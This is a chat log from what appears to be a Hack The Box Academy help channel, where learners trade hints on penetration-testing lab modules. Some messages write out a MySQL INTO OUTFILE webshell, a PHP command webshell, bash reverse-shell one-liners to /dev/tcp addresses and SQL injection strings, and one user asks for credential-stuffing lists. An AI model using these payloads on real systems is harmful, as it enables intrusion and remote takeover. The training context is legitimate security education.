i tried SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; and i get error no such file or dir
well 😉 which type of OS is it hosted on
yeah i sent the wrong one xd i used the path c:\www\webshell/php and c:\www\dashboard\webshell.php
well 😁 You are very close
You are close..
can i have admin?
@naive field Use the link as a nudge 😁
@rustic sage keep spamming like that and you will get the 👢 from mods
whatever man
Good ; )
idk what im doing wrong xd im trying c:\xampp\htdocs\webshell.php then adding dashboard in between removing stuff 🤷♂️ i looked up root dir of xampp servers and tried with those paths but no
:/
so now i just add the revshell script in the string above where i just wrote "c" for testing?
im jus asking since the shell would be long ig
oh wait maybe ftp 
||rce ||
np
how realistic is this lab? not very?
In my opinion it's very.. because it allows you to be creative / think outside of the box 😁
You have to know the default web root location of xampp .. when that doesn't work you have to figure out to which folder you can write😌
In my opinion none of the CBBH/CPTS modules are ctfish, they are made for a good reason 😁
this one was from pentester path
but ig they have similar module
yeah i feel like this rce is pretty realistic
but not sure what are the chances to actually get internal access to mysql to do this 
That's right 😁 But some questions will drive you crazy XD.. but that are there for a good reason anyway
oh yeah, they def did haha
about to do my first official web pentest for a company tommorrow
hi. hello. yes. How can I assist you.
haha, well it depends if the pentest is white or black box 😁
this just killed my confidence but whatever ig haha
hahaha 😂
Might have something to do with this @surreal rain
There are shared modules between paths. Which is why you can already have x% completed of the other path even though you didn't select it
yeah thats what i meant :)
Out of curiosity... what does the 8 hours represent?
5 days on that module

An average
I spent like maybe 4 hours on it 
tbh i never look at those hour desc, they are very inaccurate
Only AD section took me days 😂
As stated they are an average expectancy based on assumed knowledge of some of the more basic things that the module probably won't teach you
AD enum is taking me days, but that just because I'm taking like several days of breaks between them :°)
haha yea, that section is huge 😁
yeah cuz u prob knew all of this before
or were familiar with it
fs
Eh it's moreso I work retail and want to save my braincells
I have CRTP & CRTE😅 but that was some years ago.. but yea I am pretty familiar with the AD concepts. Nevertheless, their AD section is really solid
I know little to nothing about AD, most sections were just reading comprehension
haha, I am working as a Network Manager ; )
I do think Kerberos attacks module is a good fit within that section tho
Have you done intro to windows Command Line? Lol that one is funky
As a fundamental
Nope haha, I am familiar with CMD/PowerShell
Dude the exam part was kinda fun lol one of the questions being "which user has the most logon failures (event id 4625) in a row which indicates a bruteforcing attack"
not just AD, i meant others too haha
wowwwww 😂 that must be a bit of pain 😅
ill have to do that one after cpts then
sounds like its fun
haha
If you are new to the concepts.. then yea maybe 😁
New line at each timestamp
Ctrl-f is based
so do i get admin?
Anyone got a good source for cred stuffing lists?
is that a yes?
Care to share? lol
for the pw attack module?
Just in general, maybe this isn't right forum for that. if so my bad.
The modules mention it, but didn't really ever provide any known lists other than default cred lists
did you check the resources
option\
I am doing the API module and I am super stuck on Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
This is using SQLi on the id parameter. Anytime I put anything in I get the >. Cant figure out what I am doing wrong. Would appreciate a nudge
Ignore them they're a skiddie trying to get discord admin without actually knowing anything
End queries with ;
Yeah, tried that. Tried it on the browser as well. Im doing very basic things like ' OR 1=1-- -;, Im not doing any crazy SQLi
Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.
- nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n
- nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-pi
Have also been monitoring via TCPDUMP & connecting with NC
You might be missing the source of your problem. Reread the section regarding evasion. Specifically the part after Proxies.
Remember your goal is to do it quietly. Bombarding it with rnd and such will get you quickly banned out for a few minutes
Maybe url encoding is needed? Or it's reading the ' as an open quote
So it's expecting a closing quote
Ill keep playing around with it
Thank you
Only thing I can reasonably think of for it to print the >. (Which is indicating it's trying to start/finish a line, similar to bash if you use a single quote it goes to next line )
I've not been getting banned. I tried using the Source method before but I get a lot of errors despite what device I specify, I have also been following and using the syntax.
I've been using source port, i thought you meant as in source IP. Think Im over complicating as usual.
Thanks
Hint the syntax is similar to the example that uses -sS if you specify the --source-port
From there it is just going down the line
Okay thanks
ls -la
Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keeps saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?
Go to #welcome and verify, then you can ask in #starting-point
On password attacks lab - hard: Im nearly complete, I found the backup.vhd, but the only way I found this was logged into xfreerdp as joanna, then cmd command "runas /user:david cmd" so I have a terminal as david and can see the file. But im getting frustrated not being able to simply download this backup.vhd to my kali VM. What am I doing wrong or missing?
You need to find a way to download large files, before the service times out
On File Upload Attacks - Whitelist Filters, I've found something that returns the "File successfully uploaded" text, but when I go to check for the file in the directory that I've made sure is the right one, the file isn't showing up. Any nudges? I can DM as well.
there is no service that times out, im logged into a RDP session using command prompt
theres a couple results that technically bypass the filters but arent valid URLs and so cant be navigated to
so gotta skip those
hey guys, i need some directions for attacking common services medium lab
scanned nmap
tried bruteforcing what i could but nothing
i see there is domain port open, am i supposed to do dns spoofing or sm?
i mean that would lead to nowhere if u get me
so i rly dk rn
If I have the basic php webshell on a page <?php system($_GET['cmd']); ?> shouldn't I be able to run a reverse shell by visiting http://website/shellpage?cmd=bash -i >&%20/dev/tcp/10.10.14.6/4321%200>&1 (i.e., shouldn't I be able to get a reverse shell out of that one-liner?)
whats the easiest way to transfer a file from a xfreerdp session via powershell to attack kali vm
try to specify the full path to bash, e.g. /bin/bash
You can mount a local folder and use it to transfer files
Mount the drive using /drive:/home/htb/myfolder,webdrive
use : /drive:linux,</path-you-wanna-share>
Also use /dynamic-resolution 🙂
I can't seem to get this to work, ok it should work though. I mean it's command execution so it should be doable.
just got it after that tip, thanks!
I've been stuck for 4 hours on this module, Active Sub-domain enumeration
Find and submit the contents of the TXT record as the answer.
Reset lab, scan all ports?
https://imgur.com/xiCvafg - so idk if im asking this right, idk why im so confused here. I just need this backup.vhd file moved to my kali box
use dig txt
Try with another one liner, or you can try with /bin/bash -c "/bin/bash -i >& /dev/tcp/<IP>/<port> 0>&1"
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md this may be a help too
https://imgur.com/xiCvafg - does anyone know how to move this backup.vhd file to kali vm?
Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?
nmap module
I tried almost all script categories and aggressive scan and found a webserver as the hint suggests but no flag
No TXT records
There are, show me your command that you are using
You don't need to do anything with the dns port.
0xFOrk mentioned it above
even ran the command for all of these
your command is wrong
In order to see the 'right' TXT record. You have to specify an ||internal|| zone 😉
my screenshot shows that command, and its not working. Pretty sure my question is not clear since that command does not make sense in this situation
that command is for your xfreerdp one
Msg me what ur trying with screenshot I'll see
'''dig txt inlanefreight.htb ns.inlanefreight.htb'''
or verify your account and you can post images
That is not a valid command
You have to supply an other parameter in your command 😁
maybe a hint? 😉
dig --help
Review the module again, then you will understand what you are missing ; )
if not, I will provide the answer after 1 hour or so
the module is about using nslookup, however that command wont work
Dig stands for domain information groper. Using dig command you can query DNS name servers for your DNS lookup related tasks. This article explains 10 examples on how to use dig command. When you pass a domain name to the dig command, by default it displays the A record (the ip-address of the site that
Look at number; 8 of this article ; )
8. Use a Specific DNS server Using dig @dnsserver
||dig TXT @ns1.inlanefreight.htb inlanefreight.htb dig: couldn't get address for 'ns1.inlanefreight.htb': not found||
same with ns
the error is right at front of you
Understand what you are doing 😁 and why that command doesn't work
htb is not an approved top-level domain.
So you have to specify a nameserver that knows the zone.
Good job! That's the mentality, to try better and at the end you are able to solve it without too much help.
This module is confusing, same part in footprinting module had me frustrated
This means that you should definitely learn more about DNS.
ugh I had to use smbclient as david, no wonder I was stuck in an impossible spot
Hi! I'm trying to enumerate Firewall and IDS/IPS Evasion - Medium Lab, I'm using the command:
sudo nmap 10.129.113.199 -sA -sV -Pn -F --packet-trace --version-trace -n --disable-arp-ping -T 2 -D RND:5 --source-port 53
And the question is:
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Could someone point me in the right direction? I'm quite lost.
I hope someone can help me I do the footprinting lab- medium. I logged in with rdp and find a the file with the password, and now I don’t know how to connect to the sql server. I read something about, that I have to start sql with admin permissions, but I can’t type “@“ in the admin password bar does anyone have the same problem? And if I want to connect the sql database it doesn’t let me with the administrator account.
i did, i got 5 ports: ssh, pop3 , domain and ftp
2 pop3 ports
i've heard from someone i need 6 ports open
but i restarted the machine, did -p- in nmap
nothing
always same
🤷♂️
It takes like 5+ resets for the 6th port to appear
huh
lol
shit i think i even did like 5
ig ill reset
till it pops up...
Reset and wait 5mins before scanning aswell
Can anyone help me understand how this hash "31d6cfe0d16ae931b73c59d7e0c089c0" is an empty string for the HARD password attack lab? This should be the admin hash
okay
i reseted 15 times lol
ill let it wait then
a few min
Any luck?
you can use the mssql management studio application to do the query
im doing Login Brute Forcing web skills assessment. Is there a username i should be using or do i need to make a username list?
yeah
Module: Footprint > Oracle TNS
Is there a way to connect to TNS without sqlplus? It's painful to install it
Should odat be enough?
Afaik no. Following the instructions in the section should be more than enough. They even tell you what to do if you run into a couple specific errors
Has anyone finished Skills Assessment - Hard of the HTTP Misconfigurations Module? I'm stuck on a section and it's driving me crazy. Payload works, but don't understand why admin isn't hitting the page
Dm
I have a bit of a strange issue. Has anyone come across a situation where a section isn't being marked as complete even though they have answered all the questions?
You need to click "mark complete and next"
I have done that, but weirdly enough it isn't actually marking it as complete in the list.
It is the Antak Webshell section in the Shells & Payloads module. I have finished everything in the module, but that one section is preventing it from registering the module as complete.
Fair enough, thanks for looking. Wasn't sure if there was something I was missing.
did any of yall get error Authentication failed with smbmap
even tho Null login is available on the server?
What's your command?
smbmap -H ip
Ah, ok, I was gonna suggest that lol, because i remember not being able to get a null session with -u "" -p ""
Try smbclient maybe, I've done some boxes where smbclient works and smbmap doesn't
Yea, i much prefer smbmap
Hi Guys. Quick question: Just to confirm, is kirbi2john just a script to format krb5tgs-tickets? It sounds silly, though really helpful, but just spent the last ~40mins trying to debug a script that was already included in parrotOS. I'll be maining in python soon (Ik I spent way to long), but just wanted to gain a little more insight by those who have used it more than I. Thanks for the insight!
can someone help me with attacking common services lab
rq
im stuck at sm i think i should not be stuck
its a hard lab
i got onto ||rdp|| but can not connect to ||mssql|| for some reason
with the sam creds
same*
ok
dm me i can help u whats up
okay
Unverified users can't access #general
They're locked to academy, seasonal for some reason, and of course- seeing announcements
There are other creds needed
Look for other creds 🙂
i can not use the same creds i did for rdp?
am I supposed to crack the mssql creds?
Hi Guys I have some Questions in SQLMAP ESSENTIALS Modules
Q/ How I know When to use Prefix/Suffix ?
Q/ How I know When to use UNION SQLi Tuning ?
still stuck on this
I can check my notes in the evening 🙂 but I recall that I had to find creds somewhere
that sounds good, thanks
ilyk if i do it before that so u dont bother checking :)
hey, i used the same creds and ti worked
i just added the windows auth on mssql login lol
I'm still struggling with this question. Please, can anybody help me?
ok just finished the lab
and i have no idea what i have done at the end in mssql
i understand 0 of the syntax l o l
okay now i do, thanks chatgpt
Hahaha good job 🙂
Well done!!!!
im not even halfway there, 39% of the path
ugh trust the process ig lol
should i do intro to AD module before AD enum and attacks?
Depends on your previous knowledge. The module has helped me in any case
If you are new to AD.. I would do it 😁
yup, fresh as it gets
ik basic concepts of forests etc etc
and what is AD
But I can’t access that’s the problem
I have notes if you want to DM, but if you can RDP in, the application is on the target computer. Just look for it in the programs.
question 5
What is this user's cleartext password. Locate a configuration file containing an MSSQL connection string. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
Not every user has access to SSMS, it’s usually privileged user, try out the credential hunting techniques for a way forward
I wouldn't advise doing it without understanding AD authentication well enough, which the intro to AD explains sufficiently, personally one of my favourite modules
ah this one was really fun
Congratulations
gonna need some help
Web Attacks - Skills Assessment
i did PE to the admin and got the vulnerable point
but tried almost every XXE but none of them prints out
Hi All. Looking for some help on the Firewall and IDS/IPS Evasion - Hard Lab.
I have run the commands which are practically given to you in the Module.
Found the right port but when trying to run netcat to get the answer I am getting:
(UNKNOWN) [10.129.2.47] 50000 (?) : Cannot assign requested address
Any ideas?
hiya guys, Anyone doing LDAP modules?
anyone 1
@last stag - trying to enumerate an account via linux to see which user has SMARTCARD_REQUIREMENT
sadly not seeing any options for windapsearch or ldapsearch-ad
i know how to run commands on Windows to get this but from linux only i'm running into issues
okk i know ,wait me same time
HI Guys, gonna need some help
Web Attacks - Skills Assessment
i did PE to the admin and got the vulnerable point
but tried almost every XXE but none of them prints out
thanks!
Hi, Little help needed here, In the (Payloads & shells -> The Live Engagement) I am trying to upload a ruby script /php/webapps/50064.rb. But MSF is not picking it up. when i try to search by Facebook or by 50064 it shows me no results. Can someone guide how to make it loaded in MSF please.
Steps performed: 1. Changed the name of ruby script. 2. check the permission they are as the other scripts in same directory. 3. Restarted the msf. 4. ran updatedb on the system and then restarted MSF no luck.
Hi All. Looking for some help on the Firewall and IDS/IPS Evasion - Hard Lab.
I have run the commands which are practically given to you in the Module.
Found the right port but when trying to run netcat to get the answer I am getting:
(UNKNOWN) [10.129.2.47] 50000 (?) : Cannot assign requested address
Any ideas?
but I have the correct command to run. nc -nv -p 53 <IP Address> <Found Port>
which is equiv to the ncat command in the module
Look for the exploit you want to add: searchsploit sonicwall 8.1.0.2-14sv Make a note of the path for the exploit.
it's okay I installed ncat instead and it worked first time lol
any luck?
Hello, did you solve it? I'm stuck, the listener doesn't retrieve the shell
well, particularly in that section of the module you don't need a reverse shell 🙂
take a look at the part in the section that talks about custom web shell(s)
I've tried it, but I can't find the location of flag.txt
if I'm not mistaken the location of the flag file is mentioned in the question itself
Hello
Im stuck in SQLMAP ESSENTIALS -> Skills Assessment
I Don't Find any Parameter or post data
Just a static page So what I do ?
Almost I tried Every thing
if you still have issues with this you might need to initialize the postgresql db with msfdb init or reinitialize it with msfdb reinit then copy to the modules/exploit directory , then run updatedb so msf is able to find the added exploit with locate, then consequently reload msf. You can check tail -f ~/.msf4/logs/framework.logs to see in real time if it was successfully added
without postgresql loaded, no amount of updatedb would find your added exploit, from experience.
Did you run as sudo
Hi, if someone from the administration hackthebox academy could contact me because I can not reach one of the domains in the module
I'm not an admin but what domain and what module
Attacking Enterprise Networks
Module: Web Enumeration & Exploitation
Domain: gitlab.inlanefreight.local
add it to your /etc/hosts
I did that
try everything from that section ¯_(ツ)_/¯
The best part is that EyeWitness reach that page, but I cannot xD
Can anyone help me how can I create account on HTB Academy because mine isn’t working
?
Contact support. Bubble in the bottom right
@fathom pendant thanks, i resolved it via the link shared previously.
Ye I forget how silly that one is
Just got that done few minutes back.
No worries. Many thanks for checking back 🙂
anyone can help me ?
interact with the application, you will see something interesting
@autumn pilot thoughts and input?
Okay I don't Need to fuzz Directory Or parameter Right ?
Adding the entry in the hosts file will fix it
there is no need of any fuzzing
Hi, may I DM someone about question on SSH user enumeration on https://academy.hackthebox.com/module/147/section/1327 please ?
What module name ?
Password Attacks - Network Services
use the provided username and password lists from the resources
Ah. Try attacking a different service iirc there's another service running on that box
Ssh is super slow
may I dm somebody or should I spoil here ?
(yes I know the question asks ssh iirc)
ok, I will ask here then, the Openssh is 7.7 so it seems to be vulnerable to user enumeration but, trying multiple exploits, any users of the list are found as being valid.
May I enumerate users from the previously compromised WinRM session or should I try other path without reusing my initial WinRM access ?
